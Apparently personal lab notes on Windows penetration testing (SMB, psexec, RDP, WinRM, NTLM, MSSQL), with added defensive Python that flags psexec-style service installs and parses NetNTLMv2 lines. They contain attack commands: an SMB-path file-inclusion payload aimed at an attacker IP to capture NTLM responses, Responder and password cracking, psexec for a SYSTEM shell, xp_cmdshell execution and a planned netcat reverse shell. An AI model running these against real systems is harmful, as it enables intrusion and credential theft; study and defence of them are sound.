Windows PenTest Notes
SMB (Server Message Block), also encountered through its Unix/Linux implementation, Samba
Port: 445
Service name: microsoft-ds
Get list of shares:
smbclient -L \\\\<host>
Access a share:
smbclient \\\\<host>\\<share>
Commands (inside the smbclient prompt):
list directories: ls
download files: get
change directories: cd
Post-exploitation
If we can authenticate over SMB as Administrator, there are two options.
One is simply browsing the ADMIN$ or C$ share with smbclient using the Administrator credentials:
smbclient \\\\<IP>\\ADMIN$ -U Administrator
smbclient \\\\<IP>\\C$ -U Administrator
The other is psexec.py from Impacket. It requires Impacket to be installed and is a well-known, noisy technique that is easily fingerprinted. Since we can access the ADMIN$ share, we can use psexec.py to abuse this misconfiguration and get an interactive SYSTEM shell. psexec.py is part of the Impacket framework.
Impacket is a framework written in Python for working with network protocols. It is focused on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB and MSRPC), the protocol implementation itself. In short, Impacket contains dozens of useful tools for interacting with Windows systems and applications, many of which are ideal for attacking Windows and Active Directory.
One of the most commonly used tools in Impacket is psexec.py. It is named after the PsExec utility from Microsoft's Sysinternals suite, since it performs the same function: giving us a fully interactive shell on remote Windows machines.
PsExec is a portable tool from Microsoft that lets you run processes remotely using any user's credentials. It’s a bit like a remote access program but instead of controlling the computer with a mouse, commands are sent via Command Prompt, without having to manually install client software.
Like any tool, it's important to understand how Impacket's psexec works.
Impacket creates a remote service by uploading a randomly named executable to the ADMIN$ share on the remote system and then registering it as a Windows service. This results in an interactive shell on the remote Windows system via TCP port 445.
psexec requires credentials for a user with local administrator privileges or higher, since read/write access to the ADMIN$ share is needed. Once you successfully authenticate, it drops you into an NT AUTHORITY\SYSTEM shell.
impacket-psexec username:password@hostIP
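From the defender's side, the behaviour just described (a service registered from a randomly named binary dropped into ADMIN$, i.e. the Windows directory) is what to hunt for in the System event log. The following Python is an added example, not from these notes or from Impacket: it runs that heuristic over constructed Event ID 7045 records; the flattened log line format, the allowlist and the "purely alphabetic name" rule are assumptions to tune for your own environment.

```python
import re

# Constructed sample of Windows System log records (Event ID 7045, "A service was
# installed in the system"), flattened to one line each. Not real captured data.
SAMPLE_EVENTS = [
    "EventID=7045 ServiceName=WindowsUpdate ImagePath=C:\\Windows\\System32\\svchost.exe -k netsvcs ServiceType=user mode service StartType=auto start",
    "EventID=7045 ServiceName=vHkQ ImagePath=%SystemRoot%\\KzpwqTyd.exe ServiceType=user mode service StartType=demand start",
    "EventID=7036 ServiceName=Spooler ImagePath= ServiceType= StartType=",
    "EventID=7045 ServiceName=Sysmon64 ImagePath=C:\\Windows\\Sysmon64.exe ServiceType=user mode service StartType=auto start",
]

# Executable placed directly in the Windows directory, i.e. the root of ADMIN$,
# not in System32 or another subfolder. Matches both %SystemRoot% and C:\Windows.
WINDOWS_ROOT_EXE = re.compile(r"^(?:%systemroot%|c:\\windows)\\([^\\]+\.exe)$", re.IGNORECASE)

# Known-good binaries that legitimately live in the Windows root (constructed allowlist; tune it).
ALLOWLIST = {"sysmon64.exe", "sysmon.exe"}

FIELD = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")

def parse_event(line: str) -> dict:
    """Turn a flattened 'Key=Value Key=Value' record into a dict."""
    return {key: value.strip() for key, value in FIELD.findall(line)}

def is_psexec_like_install(event: dict) -> bool:
    """Heuristic: service install whose binary sits in the ADMIN$ root with a random-looking name."""
    if event.get("EventID") != "7045":
        return False
    match = WINDOWS_ROOT_EXE.match(event.get("ImagePath", ""))
    if not match:
        return False
    exe = match.group(1).lower()
    if exe in ALLOWLIST:
        return False
    # Impacket-style names are random ASCII letters (assumption about the name pattern),
    # so flag purely alphabetic stems; digits or dots usually indicate a vendor binary.
    return exe[:-4].isalpha()

def find_suspicious_installs(lines) -> list:
    """Return (ServiceName, ImagePath) for every record that looks like a psexec-style install."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_psexec_like_install(event):
            hits.append((event["ServiceName"], event["ImagePath"]))
    return hits

if __name__ == "__main__":
    for name, path in find_suspicious_installs(SAMPLE_EVENTS):
        print(f"ALERT: service {name!r} installed from ADMIN$ root: {path}")
```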
RDP(Remote Desktop Protocol)
Note: telnet is the older remote access service that comes without encryption by default.
Running on port 3389: ms-wbt-server (Microsoft Remote Display Protocol)
ms-wbt-server is the RDP service that gives access to the Windows machine.
To connect we can use xfreerdp.
Command options (no space between the option and its value):
/v:<host>     specify host
/u:<user>     specify user
/d:<domain>   specify domain
xfreerdp /v:<host> /d:<domain that nmap gave us> /u:<username>
WinRM(Windows Remote Management)
Windows Remote Management, or WinRM, is a Windows-native, built-in remote management protocol that uses the Simple Object Access Protocol (SOAP) to interact with remote computers and servers, as well as operating systems and applications.
WinRM allows the user to:
Remotely communicate and interface with hosts
Execute commands remotely on systems that are not local to you but are reachable over the network.
Monitor, manage and configure servers, operating systems and client machines from a remote location.
As a pentester, this means that if we can find credentials (typically username and password) for a user who has remote management privileges, we can potentially get a PowerShell shell on the host.
Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.
evil-winrm -i <host> -u <user> -p <pass>
NTLM (New Technology LAN Manager)
NTLM is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. It is a type of single sign-on (SSO) because it allows the user to provide the underlying authentication factor only once, at login. The NTLM authentication process works as follows:
The client sends the user name and domain name to the server.
The server generates a random character string, referred to as the challenge.
The client encrypts the challenge with the NTLM hash of the user password and sends it back to the server.
The server retrieves the user's password hash (or equivalent).
The server uses the hash value retrieved from the security account database to encrypt the challenge string. The value is then compared to the value received from the client. If the values match, the client is authenticated. A more detailed explanation of the working of NTLM authentication can be found here.
NTLM vs NTHash vs NetNTLMv2
The terminology around NTLM authentication is messy, and even pros misuse it from time to time, so let's get some key terms defined:
A hash function is a one-way function that takes any amount of data and returns a fixed-size value. Typically, the result is referred to as a hash, digest, or fingerprint. Hashes are used for storing passwords more securely, as there's no way to convert the hash directly back to the original data (though there are attacks that attempt to recover passwords from hashes, as we'll see later). So a server can store a hash of your password; when you submit your password to the site, it hashes your input and compares the result to the hash in the database, and if they match, it knows you supplied the correct password.
An NTHash is the output of the algorithm used to store passwords on Windows systems in the SAM database and on domain controllers. An NTHash is often referred to as an NTLM hash or even just an NTLM, which is very misleading / confusing. When the NTLM protocol wants to do authentication over the network, it uses a challenge / response model as described above.
A NetNTLMv2 challenge / response is a string specifically formatted to include the challenge and response. This is often referred to as a NetNTLMv2 hash, but it's not actually a hash. Still, it is regularly referred to as a hash because we attack it in the same manner. You'll see NetNTLMv2 objects referred to as NTLMv2, or even confusingly as NTLM.
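To make the "not actually a hash" point concrete, here is an added Python example (not from the original notes or from Responder) that parses a constructed NetNTLMv2 line in the user::DOMAIN:challenge:NTProofStr:blob layout and unpacks the blob fields defined in MS-NLMP (timestamp, client challenge, AV pairs). Every value in the sample is made up for the example.

```python
import struct
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# AvId values from the NTLMv2 AV_PAIR structure (MS-NLMP); string-valued ones are UTF-16LE.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            9: "TargetName", 10: "ChannelBindings"}
STRING_AVS = {1, 2, 3, 4, 5, 9}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

@dataclass
class NetNtlmV2:
    user: str
    domain: str
    server_challenge: str   # 8 bytes sent by the server, hex
    nt_proof: str           # 16-byte HMAC-MD5 response (NTProofStr), hex
    timestamp: datetime     # client clock, taken from the blob
    client_challenge: str   # 8 bytes chosen by the client, hex
    av_pairs: dict = field(default_factory=dict)

def parse_netntlmv2(line: str) -> NetNtlmV2:
    """Split a 'user::DOMAIN:challenge:NTProofStr:blob' line into its components."""
    user, _, domain, challenge, proof, blob_hex = line.strip().split(":")
    if len(challenge) != 16 or len(proof) != 32:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes")
    blob = bytes.fromhex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:
        raise ValueError("unexpected NTLMv2_CLIENT_CHALLENGE response type")
    filetime, = struct.unpack("<Q", blob[8:16])          # 100 ns ticks since 1601-01-01
    ts = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    client_challenge = blob[16:24].hex()
    pairs, offset = {}, 28                               # AV pairs follow 4 reserved bytes
    while offset + 4 <= len(blob):
        av_id, av_len = struct.unpack("<HH", blob[offset:offset + 4])
        value = blob[offset + 4:offset + 4 + av_len]
        offset += 4 + av_len
        if av_id == 0:                                   # MsvAvEOL terminates the list
            break
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        pairs[name] = value.decode("utf-16-le") if av_id in STRING_AVS else value.hex()
    return NetNtlmV2(user, domain, challenge, proof, ts, client_challenge, pairs)

# Constructed sample in the layout Responder prints; all values are made up for this example.
SAMPLE = ("Administrator::LAB:1f2e3d4c5b6a7988:0123456789abcdef0123456789abcdef:"
          "0101000000000000" "0000c3fd731dd901" "1122334455667788" "00000000"
          "02000600" "4c0041004200" "01000800" "4400430030003100" "00000000" "00000000")

if __name__ == "__main__":
    print(parse_netntlmv2(SAMPLE))
```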
Capturing NTLM hash from file inclusion
In the PHP configuration file php.ini, the "allow_url_include" directive is set to "Off" by default, meaning PHP does not load remote HTTP or FTP URLs, which prevents remote file inclusion attacks. However, even if allow_url_include and allow_url_fopen are set to "Off", PHP will still load SMB URLs.
In our case, we can abuse this behaviour to capture the NetNTLMv2 challenge/response (the "NTLM hash").
We start Responder: clone the repo, or on Kali it is installed by default. Then enable the SMB server and disable the HTTP server in the Responder configuration (on Kali it is located at /usr/share/responder/Responder.conf).
sudo responder -I tun0
In the file inclusion vulnerability we point the include at our own host, like: http://unika.htb/index.php?page=//10.10.14.17/something (10.10.14.17 being the attacker IP, my IP)
We will receive something like this in Responder:
Copy the hash to a file and crack it with John the Ripper:
john --wordlist=~/tools/seclists/Passwords/Leaked-Databases/rockyou.txt hash
After obtaining the credentials of the user running the server (Administrator in this case), we can use them with WinRM to upload a shell to the Windows machine.
Microsoft SQL Server
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
Port: 1433
There is a way to connect to Microsoft SQL Server through a tool from the Impacket collection, mssqlclient.
If we have the credentials and the domain, the command is:
impacket-mssqlclient -windows-auth [[domain/]username[:password]@]<IP>
The next step is to enumerate our role and permissions in the SQL database.
Once we know we have high-level permissions, we can try to execute commands on the target machine through xp_cmdshell.
xp_cmdshell is an extended stored procedure, disabled by default, that runs commands on the target machine through cmd.
To check whether it is enabled, execute:
EXEC xp_cmdshell 'net user';
To enable:
To execute commands:
Once we got command execution the next step is to get a reverse shell. For that we need to upload the netcat binary from here.
Then enumerate the target machine: